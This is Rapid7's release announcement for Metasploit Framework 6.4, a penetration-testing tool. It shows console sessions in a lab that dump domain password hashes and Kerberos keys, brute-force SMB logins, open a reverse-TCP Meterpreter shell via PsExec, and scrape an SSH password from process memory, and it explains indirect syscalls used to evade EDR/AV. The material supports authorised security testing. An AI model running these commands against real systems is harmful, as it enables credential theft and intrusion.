Last updated at Mon, 25 Mar 2024 13:45:59 GMT
Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.
For news reporters, please reach out to press@rapid7.com.
Kerberos Improvements
Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.
- The
auxiliary/admin/kerberos/forge_ticketmodule was updated with:- Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
- The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
- We added the
post/windows/manage/kerberos_ticketspost module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’sklist/dumpcommands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation. - The
auxiliary/gather/windows_secrets_dumpmodule was updated to support pass-the-ticket authentication when using the DCSync technique (theDOMAINaction). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.
Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:
msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL vagrant@DEMO.LOCAL
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…
# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…
[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed
DNS Configuration
One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.
Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.
Examples of manipulating the DNS configuration:
dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1
Viewing the current configuration:
msf6 > dns print
Default search domain: N/A
Default search list:
* tor.example.com
* localdomain
Current cache size: 0
Resolver rule entries
=====================
# Rule Resolver Comm channel
- ---- -------- ------------
1 *.lab.lan 192.0.2.1 Session 1
2 honeypot.lab.lan black-hole N/A
3 *
. \_ static N/A
. \_ 10.4.5.45
. \_ 10.3.20.98
Static hostnames
================
Hostname IPv4 Address IPv6 Address
-------- ------------ ------------
example.lab.lan 192.0.2.200
example2.lab.lan 192.0.2.201
New session types
Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.
New SMB Session Type Examples
You can open a new SMB session by setting the CreateSession option:
msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true
[*] 192.168.123.133:445 - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445 - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445 - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
The session will open as a new SMB session type:
msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB vagrant @ 192.168.123.133:445 192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >
Interacting with the session allows for direct file manipulation of the remote host including upload and download support:
msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 foo DISK
3 IPC$ IPC|SPECIAL Remote IPC
4 NETLOGON DISK Logon server share
5 SYSVOL DISK Logon server share
SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2023-09-15T18:56:07+01:00 2023-10-10T12:39:26+01:00 2023-10-10T12:39:26+01:00 2023-10-10T12:39:26+01:00
1 DIR .. 2021-05-08T09:06:51+01:00 2024-02-01T13:11:41+00:00 2024-02-01T13:11:41+00:00 2024-02-01T13:11:41+00:00
2 FILE passwords.docx 2023-10-10T12:34:57+01:00 2023-10-10T12:38:53+01:00 2023-10-10T12:38:53+01:00 2023-10-10T12:38:53+01:00 1403
The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1
Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:
msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >
Kerberos authentication is also supported:
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true
[*] 192.168.123.133:445 - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445 - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
New SQL Session Types Examples
Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:
msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password
Which will create a new SQL session:
[*] 192.168.2.242:1433 - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433 - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433 - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:
msf6 auxiliary(scanner/mssql/mssql_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 mssql MSSQL test @ 192.168.2.242:143 192.168.2.1:60963 -> 192.168.23 .242:1433 (192.168.2.242)
msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
# NULL
- ----
0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Developer Edition (64-bit) on Windows Server 2022 Stand
ard 10.0 <X64> (Build 20348: ) (Hypervisor)
The query_interactive command will start an interactive prompt for running multiple multi-line queries:
mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
# TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
- ------------- ------------ ---------- ----------
0 master dbo spt_fallback_db BASE TABLE
1 master dbo spt_fallback_dev BASE TABLE
2 master dbo spt_fallback_usg BASE TABLE
4 master dbo Users BASE TABLE
5 master dbo spt_monitor BASE TABLE
6 master dbo MSreplication_options BASE TABLE
SQL >>
Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:
msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql
Indirect Syscalls Support for Windows Meterpreter
Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.
This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.
The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.
Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an “indirect syscall”. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.
This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.
Discoverability Improvements
The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.
Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/forge_ticket . normal No Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
1 \_ action: FORGE_DIAMOND . . . Forge a Diamond Ticket
2 \_ action: FORGE_GOLDEN . . . Forge a Golden Ticket
3 \_ action: FORGE_SAPPHIRE . . . Forge a Sapphire Ticket
4 \_ action: FORGE_SILVER . . . Forge a Silver Ticket
5 \_ AKA: Ticketer . . . .
6 \_ AKA: Klist . . . .
7 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf6 auxiliary(scanner/mysql/mysql_hashdump) >
Windows Meterpreter Memory Searching
Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.
This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:
msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"
[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
ssh.exe (pid: 2972)
[*] Memory Matches for ssh.exe (pid: 2972)
======================================
Match Address Match Length Match Buffer Memory Region Start Memory Region Size
------------- ------------ ------------ ------------------- ------------------
0x0000000A00060DF0 127 "publickey,password......3.......myverysecretpassword....................#.........#.......... 0x0000000A00000000 0x0000000000090000
...........S......................"
[*] Post module execution completed
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro
Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.
